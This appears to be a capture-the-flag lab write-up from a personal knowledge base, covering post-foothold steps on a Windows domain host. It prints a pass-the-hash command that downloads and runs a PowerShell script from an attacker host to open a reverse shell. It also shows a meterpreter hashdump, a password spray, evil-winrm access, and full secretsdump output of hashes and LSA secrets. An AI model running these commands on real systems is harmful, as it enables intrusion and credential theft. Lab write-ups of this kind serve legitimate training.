Malleum Knowledge Base

Intial Foothold

3 min read

Steps After Obataing a Reverse Shell

Getting the Reverse Shell

After having failed attempt with the other tools, I decided to use crackmapexec to execute powershell command directly.

proxychains crackmapexec smb 172.16.1.101 -u wsadmin -H 669b12a3bac275251170afbe2c5de8c2 /domain:corp.local -X "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.135:8000/large1.ps1')"

#python server up and running where the large1.ps1 was located and chaging the port value

#nc listenter up and running
#powershell -c

After performing the above actions I got the revereshell.

Enumeration

I found a new flag in the Desktop folder of the wsadmin.

OFFSHORE{mimikatz_d03s_th3_j0b}

I also checked into the Backup directory and found credentials for the svc_iis users.

     <authentication mode="Forms">      
            <credentials passwordFormat="Clear">      
                <user name="svc_iis" password="Vintage!" />      
            </credentials>

Using the Password

As soon as I obtain new set of credential next step it to use crackmapexec to check if I have access to any systems and Voalla!! I got access on the same system.So I now don’t need to use the hash anymore.

proxychains crackmapexec smb 172.16.1.0/24 -u svc_iis -p Vintage! 


[+] corp.local\svc_iis:Vintage! (Pwn3d!)

Accessing the machine with the newly obtained set of credentials

  1. No access with xfreerdp (I really need to figure it out)

I then tried using Evil-WInRM

proxychains evil-winrm -i 172.16.1.101 -u svc_iis -p Vintage!

Uploading the meterpreter shell

upload reverse.exe


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:d317b8ce3dd5098589c047a220cf0b12:::

Problems with meterepreter shell

Impacket in action


└─$ proxychains impacket-secretsdump 'corp.local/svc_iis:Vintage!@172.16.1.101'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.1.101:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x54a7f6c97fd9cf227f4854cdecc675c2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:d317b8ce3dd5098589c047a220cf0b12:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/iamtheadministrator:$DCC2$10240#iamtheadministrator#3c1e5b31c203b2b52920f7ce19110ab4
CORP.LOCAL/wsadmin:$DCC2$10240#wsadmin#fd88913b9ecd31d42d450b4c92df1c7c
CORP.LOCAL/ned.flanders_adm:$DCC2$10240#ned.flanders_adm#f29265de0b0a15746aaba163f152d716
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
CORP\WS02$:aes256-cts-hmac-sha1-96:dd6bfdd43a405922d7d002601b0b271a35e8d28e728e452bc8854961b0bf60b6
CORP\WS02$:aes128-cts-hmac-sha1-96:4f85935f31c56413248afb81b6ba8646
CORP\WS02$:des-cbc-md5:badfd96d34f258ea
CORP\WS02$:plain_password_hex:2000430028002c00580048002f0043003c00500061007a00310041003e007300460020007a0066002e006a00600056002f005e005f0054002e002200410071002f006c0023006300440069007400520077003c00420040006d002e0037002f0065002c003b004f005e004d002a005200480071002f007300710046006c004a006200210047004c006f00740049005c004e00350066003600560035003700310051005a0029004b004f003b002a005d004d0067006e004800570024003c005b007400780052004e0079006700480079003000410078006a0060005b0065002f00650067006b005400350062006c003400
CORP\WS02$:aad3b435b51404eeaad3b435b51404ee:c72e375bed0918ced38b7a8d3e7f5e09:::
[*] DefaultPassword 
(Unknown User):Workstationadmin1!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x4710434207883cdf6d1358ed9a8baeefd80bae5c
dpapi_userkey:0x72351cfde99a602e9db7e43c4a6af6888ce743a8
[*] NL$KM 
 0000   72 C4 A9 DE F2 8D 95 21  1E 5F EA CD 63 3F A8 36   r......!._..c?.6
 0010   31 8A 48 04 5C E4 7B 3D  98 AE 6D 70 A4 07 56 23   1.H.\.{=..mp..V#
 0020   76 15 8F 1C 29 6F 33 10  B7 38 FA B4 F6 6A 5B 6E   v...)o3..8...j[n
 0030   52 52 F3 55 B3 BB D6 9E  D1 E0 6B 48 91 83 F8 29   RR.U......kH...)
NL$KM:72c4a9def28d95211e5feacd633fa836318a48045ce47b3d98ae6d70a407562376158f1c296f3310b738fab4f66a5b6e5252f355b3bbd69ed1e06b489183f829
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Password cracked for wsadmin

SMB 172.16.1.101 445 WS02 [+] corp.local\wsadmin:Workstationadmin1! (Pwn3d!)

Graph View

Backlinks